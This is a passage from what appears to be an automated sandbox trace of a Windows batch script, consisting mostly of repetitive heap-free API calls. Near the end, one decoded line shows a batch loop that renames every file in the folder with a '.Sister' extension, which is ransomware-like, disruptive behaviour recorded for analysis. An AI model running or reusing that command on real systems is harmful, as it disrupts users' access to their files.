0x21ed8c70000 [0202.999] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6d6b0) returned 1 [0202.999] GetProcessHeap () returned 0x21ed8c70000 [0203.000] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6ba70) returned 1 [0203.000] GetProcessHeap () returned 0x21ed8c70000 [0203.000] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6d280) returned 1 [0203.000] GetProcessHeap () returned 0x21ed8c70000 [0203.000] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d67630) returned 1 [0203.000] GetProcessHeap () returned 0x21ed8c70000 [0203.000] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9571a00) returned 1 [0203.000] GetProcessHeap () returned 0x21ed8c70000 [0203.001] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9571640) returned 1 [0203.001] GetProcessHeap () returned 0x21ed8c70000 [0203.001] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9571880) returned 1 [0203.001] GetProcessHeap () returned 0x21ed8c70000 [0203.001] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9577fb0) returned 1 [0203.001] GetProcessHeap () returned 0x21ed8c70000 [0203.001] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9577f70) returned 1 [0203.001] GetProcessHeap () returned 0x21ed8c70000 [0203.001] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6d1b0) returned 1 [0203.001] GetProcessHeap () returned 0x21ed8c70000 [0203.001] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9a14820) returned 1 [0203.001] GetProcessHeap () returned 0x21ed8c70000 [0203.001] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9576ed0) returned 1 [0203.001] GetProcessHeap () returned 0x21ed8c70000 [0203.002] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9a55f20) returned 1 [0203.002] GetProcessHeap () returned 0x21ed8c70000 [0203.002] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9576c60) returned 1 [0203.002] GetProcessHeap () returned 0x21ed8c70000 [0203.002] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9a14760) returned 1 [0203.002] GetProcessHeap () returned 0x21ed8c70000 [0203.002] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6dde0) returned 1 [0203.002] GetProcessHeap () returned 0x21ed8c70000 [0203.002] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93794b0) returned 1 [0203.002] GetProcessHeap () returned 0x21ed8c70000 [0203.002] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6cc00) returned 1 [0203.002] GetProcessHeap () returned 0x21ed8c70000 [0203.002] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937a830) returned 1 [0203.002] GetProcessHeap () returned 0x21ed8c70000 [0203.002] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937ae30) returned 1 [0203.002] GetProcessHeap () returned 0x21ed8c70000 [0203.002] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9577dc0) returned 1 [0203.002] GetProcessHeap () returned 0x21ed8c70000 [0203.002] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9577d80) returned 1 [0203.002] GetProcessHeap () returned 0x21ed8c70000 [0203.002] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9577ae0) returned 1 [0203.002] GetProcessHeap () returned 0x21ed8c70000 [0203.002] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937aaf0) returned 1 [0203.002] GetProcessHeap () returned 0x21ed8c70000 [0203.002] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9577930) returned 1 [0203.002] GetProcessHeap () returned 0x21ed8c70000 [0203.002] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed95778f0) returned 1 [0203.002] GetProcessHeap () returned 0x21ed8c70000 [0203.003] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed95742f0) returned 1 [0203.003] GetProcessHeap () returned 0x21ed8c70000 [0203.003] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9a459f0) returned 1 [0203.003] GetProcessHeap () returned 0x21ed8c70000 [0203.003] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9574f20) returned 1 [0203.003] GetProcessHeap () returned 0x21ed8c70000 [0203.003] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9a14580) returned 1 [0203.003] GetProcessHeap () returned 0x21ed8c70000 [0203.003] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6d070) returned 1 [0203.003] GetProcessHeap () returned 0x21ed8c70000 [0203.003] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6ab70) returned 1 [0203.003] GetProcessHeap () returned 0x21ed8c70000 [0203.003] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6dca0) returned 1 [0203.003] GetProcessHeap () returned 0x21ed8c70000 [0203.003] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d67330) returned 1 [0203.003] GetProcessHeap () returned 0x21ed8c70000 [0203.003] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9571340) returned 1 [0203.003] GetProcessHeap () returned 0x21ed8c70000 [0203.003] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed95729c0) returned 1 [0203.003] GetProcessHeap () returned 0x21ed8c70000 [0203.003] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9571700) returned 1 [0203.003] GetProcessHeap () returned 0x21ed8c70000 [0203.003] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9a45550) returned 1 [0203.003] GetProcessHeap () returned 0x21ed8c70000 [0203.003] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9a45510) returned 1 [0203.003] GetProcessHeap () returned 0x21ed8c70000 [0203.003] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6dbd0) returned 1 [0203.003] GetProcessHeap () returned 0x21ed8c70000 [0203.004] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9a14940) returned 1 [0203.004] GetProcessHeap () returned 0x21ed8c70000 [0203.004] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9576510) returned 1 [0203.004] GetProcessHeap () returned 0x21ed8c70000 [0203.004] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9a35520) returned 1 [0203.008] GetProcessHeap () returned 0x21ed8c70000 [0203.008] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed955a5d0) returned 1 [0203.008] GetProcessHeap () returned 0x21ed8c70000 [0203.008] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9a14700) returned 1 [0203.008] GetProcessHeap () returned 0x21ed8c70000 [0203.008] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6cb70) returned 1 [0203.008] GetProcessHeap () returned 0x21ed8c70000 [0203.008] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9378e80) returned 1 [0203.008] GetProcessHeap () returned 0x21ed8c70000 [0203.008] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6cae0) returned 1 [0203.008] GetProcessHeap () returned 0x21ed8c70000 [0203.008] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937abb0) returned 1 [0203.008] GetProcessHeap () returned 0x21ed8c70000 [0203.008] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937a9b0) returned 1 [0203.008] GetProcessHeap () returned 0x21ed8c70000 [0203.008] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9573720) returned 1 [0203.008] GetProcessHeap () returned 0x21ed8c70000 [0203.008] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed95736e0) returned 1 [0203.008] GetProcessHeap () returned 0x21ed8c70000 [0203.008] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9573440) returned 1 [0203.008] GetProcessHeap () returned 0x21ed8c70000 [0203.008] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937b1b0) returned 1 [0203.008] GetProcessHeap () returned 0x21ed8c70000 [0203.008] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9573280) returned 1 [0203.008] GetProcessHeap () returned 0x21ed8c70000 [0203.009] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9573240) returned 1 [0203.009] GetProcessHeap () returned 0x21ed8c70000 [0203.009] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed955a360) returned 1 [0203.009] GetProcessHeap () returned 0x21ed8c70000 [0203.009] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9a25530) returned 1 [0203.011] GetProcessHeap () returned 0x21ed8c70000 [0203.011] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed95594c0) returned 1 [0203.011] GetProcessHeap () returned 0x21ed8c70000 [0203.011] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9a147c0) returned 1 [0203.011] GetProcessHeap () returned 0x21ed8c70000 [0203.011] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6d570) returned 1 [0203.011] GetProcessHeap () returned 0x21ed8c70000 [0203.011] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6b2f0) returned 1 [0203.011] GetProcessHeap () returned 0x21ed8c70000 [0203.011] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6c9a0) returned 1 [0203.011] GetProcessHeap () returned 0x21ed8c70000 [0203.011] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d670b0) returned 1 [0203.011] GetProcessHeap () returned 0x21ed8c70000 [0203.011] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9571e80) returned 1 [0203.011] GetProcessHeap () returned 0x21ed8c70000 [0203.011] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937de10) returned 1 [0203.011] GetProcessHeap () returned 0x21ed8c70000 [0203.011] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937dd50) returned 1 [0203.011] GetProcessHeap () returned 0x21ed8c70000 [0203.011] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9a25090) returned 1 [0203.011] GetProcessHeap () returned 0x21ed8c70000 [0203.011] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9a25050) returned 1 [0203.011] GetProcessHeap () returned 0x21ed8c70000 [0203.011] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6c8d0) returned 1 [0203.011] GetProcessHeap () returned 0x21ed8c70000 [0203.012] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9a14100) returned 1 [0203.012] GetProcessHeap () returned 0x21ed8c70000 [0203.012] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed955ccd0) returned 1 [0203.012] GetProcessHeap () returned 0x21ed8c70000 [0203.012] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9a15060) returned 1 [0203.012] GetProcessHeap () returned 0x21ed8c70000 [0203.012] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed955b950) returned 1 [0203.012] GetProcessHeap () returned 0x21ed8c70000 [0203.012] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9a146a0) returned 1 [0203.012] GetProcessHeap () returned 0x21ed8c70000 [0203.012] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6c840) returned 1 [0203.012] GetProcessHeap () returned 0x21ed8c70000 [0203.012] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9379930) returned 1 [0203.012] GetProcessHeap () returned 0x21ed8c70000 [0203.012] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6c480) returned 1 [0203.012] GetProcessHeap () returned 0x21ed8c70000 [0203.012] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937b170) returned 1 [0203.012] GetProcessHeap () returned 0x21ed8c70000 [0203.012] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6eb30) returned 1 [0203.012] GetProcessHeap () returned 0x21ed8c70000 [0203.012] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9a10030) returned 1 [0203.012] GetProcessHeap () returned 0x21ed8c70000 [0203.012] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9a0fff0) returned 1 [0203.012] GetProcessHeap () returned 0x21ed8c70000 [0203.012] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9570f90) returned 1 [0203.013] GetProcessHeap () returned 0x21ed8c70000 [0203.013] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6e270) returned 1 [0203.013] GetProcessHeap () returned 0x21ed8c70000 [0203.013] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9570db0) returned 1 [0203.013] GetProcessHeap () returned 0x21ed8c70000 [0203.013] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9570d70) returned 1 [0203.013] GetProcessHeap () returned 0x21ed8c70000 [0203.013] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed955b6e0) returned 1 [0203.013] GetProcessHeap () returned 0x21ed8c70000 [0203.013] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9a00000) returned 1 [0203.013] GetProcessHeap () returned 0x21ed8c70000 [0203.013] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed955c580) returned 1 [0203.013] GetProcessHeap () returned 0x21ed8c70000 [0203.013] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d65460) returned 1 [0203.013] GetProcessHeap () returned 0x21ed8c70000 [0203.013] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6cf30) returned 1 [0203.013] GetProcessHeap () returned 0x21ed8c70000 [0203.013] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6b7f0) returned 1 [0203.013] GetProcessHeap () returned 0x21ed8c70000 [0203.013] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6cdf0) returned 1 [0203.013] GetProcessHeap () returned 0x21ed8c70000 [0203.013] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d66f30) returned 1 [0203.013] GetProcessHeap () returned 0x21ed8c70000 [0203.013] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937da50) returned 1 [0203.014] GetProcessHeap () returned 0x21ed8c70000 [0203.014] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937d810) returned 1 [0203.014] GetProcessHeap () returned 0x21ed8c70000 [0203.014] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937d690) returned 1 [0203.014] GetProcessHeap () returned 0x21ed8c70000 [0203.014] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed95708d0) returned 1 [0203.014] GetProcessHeap () returned 0x21ed8c70000 [0203.014] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9570890) returned 1 [0203.014] GetProcessHeap () returned 0x21ed8c70000 [0203.014] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6cd20) returned 1 [0203.014] GetProcessHeap () returned 0x21ed8c70000 [0203.014] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d65400) returned 1 [0203.014] GetProcessHeap () returned 0x21ed8c70000 [0203.014] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed955c310) returned 1 [0203.014] GetProcessHeap () returned 0x21ed8c70000 [0203.014] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed99f0010) returned 1 [0203.014] GetProcessHeap () returned 0x21ed8c70000 [0203.014] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9559730) returned 1 [0203.014] GetProcessHeap () returned 0x21ed8c70000 [0203.014] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d64c20) returned 1 [0203.014] GetProcessHeap () returned 0x21ed8c70000 [0203.014] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed955d2b0) returned 1 [0203.014] GetProcessHeap () returned 0x21ed8c70000 [0203.014] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937a220) returned 1 [0203.014] GetProcessHeap () returned 0x21ed8c70000 [0203.014] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937be50) returned 1 [0203.014] GetProcessHeap () returned 0x21ed8c70000 [0203.015] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937b270) returned 1 [0203.015] GetProcessHeap () returned 0x21ed8c70000 [0203.015] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6e950) returned 1 [0203.015] GetProcessHeap () returned 0x21ed8c70000 [0203.015] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9570690) returned 1 [0203.015] GetProcessHeap () returned 0x21ed8c70000 [0203.015] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9570650) returned 1 [0203.015] GetProcessHeap () returned 0x21ed8c70000 [0203.015] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed95703b0) returned 1 [0203.015] GetProcessHeap () returned 0x21ed8c70000 [0203.015] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6e3b0) returned 1 [0203.015] GetProcessHeap () returned 0x21ed8c70000 [0203.015] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed95701b0) returned 1 [0203.015] GetProcessHeap () returned 0x21ed8c70000 [0203.015] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9570170) returned 1 [0203.015] GetProcessHeap () returned 0x21ed8c70000 [0203.015] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed9559250) returned 1 [0203.015] GetProcessHeap () returned 0x21ed8c70000 [0203.015] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed99e0020) returned 1 [0203.019] GetProcessHeap () returned 0x21ed8c70000 [0203.019] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed955b470) returned 1 [0203.019] GetProcessHeap () returned 0x21ed8c70000 [0203.019] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d65340) returned 1 [0203.019] GetProcessHeap () returned 0x21ed8c70000 [0203.019] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6c340) returned 1 [0203.019] GetProcessHeap () returned 0x21ed8c70000 [0203.019] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6b930) returned 1 [0203.019] GetProcessHeap () returned 0x21ed8c70000 [0203.019] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6c200) returned 1 [0203.019] GetProcessHeap () returned 0x21ed8c70000 [0203.019] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d67bb0) returned 1 [0203.019] GetProcessHeap () returned 0x21ed8c70000 [0203.019] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937dc90) returned 1 [0203.019] GetProcessHeap () returned 0x21ed8c70000 [0203.019] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937d5d0) returned 1 [0203.019] GetProcessHeap () returned 0x21ed8c70000 [0203.019] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937d450) returned 1 [0203.019] GetProcessHeap () returned 0x21ed8c70000 [0203.019] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed956fcd0) returned 1 [0203.019] GetProcessHeap () returned 0x21ed8c70000 [0203.019] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed956fc90) returned 1 [0203.019] GetProcessHeap () returned 0x21ed8c70000 [0203.019] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6c130) returned 1 [0203.020] GetProcessHeap () returned 0x21ed8c70000 [0203.020] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d64bc0) returned 1 [0203.020] GetProcessHeap () returned 0x21ed8c70000 [0203.020] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed955ca60) returned 1 [0203.020] GetProcessHeap () returned 0x21ed8c70000 [0203.020] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed99d0030) returned 1 [0203.020] GetProcessHeap () returned 0x21ed8c70000 [0203.020] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed955b200) returned 1 [0203.020] GetProcessHeap () returned 0x21ed8c70000 [0203.020] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d64b60) returned 1 [0203.020] GetProcessHeap () returned 0x21ed8c70000 [0203.020] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d640a0) returned 1 [0203.020] GetProcessHeap () returned 0x21ed8c70000 [0203.021] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d64110) returned 1 [0203.021] GetProcessHeap () returned 0x21ed8c70000 [0203.021] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d64030) returned 1 [0203.021] GetProcessHeap () returned 0x21ed8c70000 [0203.021] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45e00) returned 1 [0203.021] GetProcessHeap () returned 0x21ed8c70000 [0203.021] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937aa70) returned 1 [0203.021] GetProcessHeap () returned 0x21ed8c70000 [0203.021] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed956fb30) returned 1 [0203.021] GetProcessHeap () returned 0x21ed8c70000 [0203.021] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed956faf0) returned 1 [0203.021] GetProcessHeap () returned 0x21ed8c70000 [0203.021] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed956f850) returned 1 [0203.021] GetProcessHeap () returned 0x21ed8c70000 [0203.021] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937b0b0) returned 1 [0203.021] GetProcessHeap () returned 0x21ed8c70000 [0203.021] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed956f6f0) returned 1 [0203.021] GetProcessHeap () returned 0x21ed8c70000 [0203.021] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed956f6b0) returned 1 [0203.021] GetProcessHeap () returned 0x21ed8c70000 [0203.021] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed955be30) returned 1 [0203.021] GetProcessHeap () returned 0x21ed8c70000 [0203.021] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed99c0040) returned 1 [0203.021] GetProcessHeap () returned 0x21ed8c70000 [0203.021] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed955aab0) returned 1 [0203.021] GetProcessHeap () returned 0x21ed8c70000 [0203.021] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d652e0) returned 1 [0203.021] GetProcessHeap () returned 0x21ed8c70000 [0203.021] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6c700) returned 1 [0203.021] GetProcessHeap () returned 0x21ed8c70000 [0203.021] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6b430) returned 1 [0203.022] GetProcessHeap () returned 0x21ed8c70000 [0203.022] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d6c5c0) returned 1 [0203.022] GetProcessHeap () returned 0x21ed8c70000 [0203.022] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d66eb0) returned 1 [0203.022] GetProcessHeap () returned 0x21ed8c70000 [0203.022] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed937d990) returned 1 [0203.174] _get_osfhandle (_FileHandle=3) returned 0x98 [0203.174] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x140 [0203.174] ReadFile (in: hFile=0x98, lpBuffer=0x7ff66c5c9970, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xa6cf4fe970, lpOverlapped=0x0 | out: lpBuffer=0x7ff66c5c9970*, lpNumberOfBytesRead=0xa6cf4fe970*=0x3bd, lpOverlapped=0x0) returned 1 [0203.175] SetFilePointer (in: hFile=0x98, lDistanceToMove=322, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x142 [0203.175] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x7ff66c5c9970, cbMultiByte=2, lpWideCharStr=0x7ff66c5d3c30, cchWideChar=8191 | out: lpWideCharStr="\r\nr %%a in (*) do ren \"%%a\" \"%%~a.Sister\"&for %%a in (%0) do ren \"%%~a.Sister\" \"%%~na.bat\"\r\n") returned 2 [0203.175] _get_osfhandle (_FileHandle=3) returned 0x98 [0203.175] GetFileType (hFile=0x98) returned 0x1 [0203.176] _get_osfhandle (_FileHandle=3) returned 0x98 [0203.176] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x142 [0203.176] GetProcessHeap () returned 0x21ed8c70000 [0203.176] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 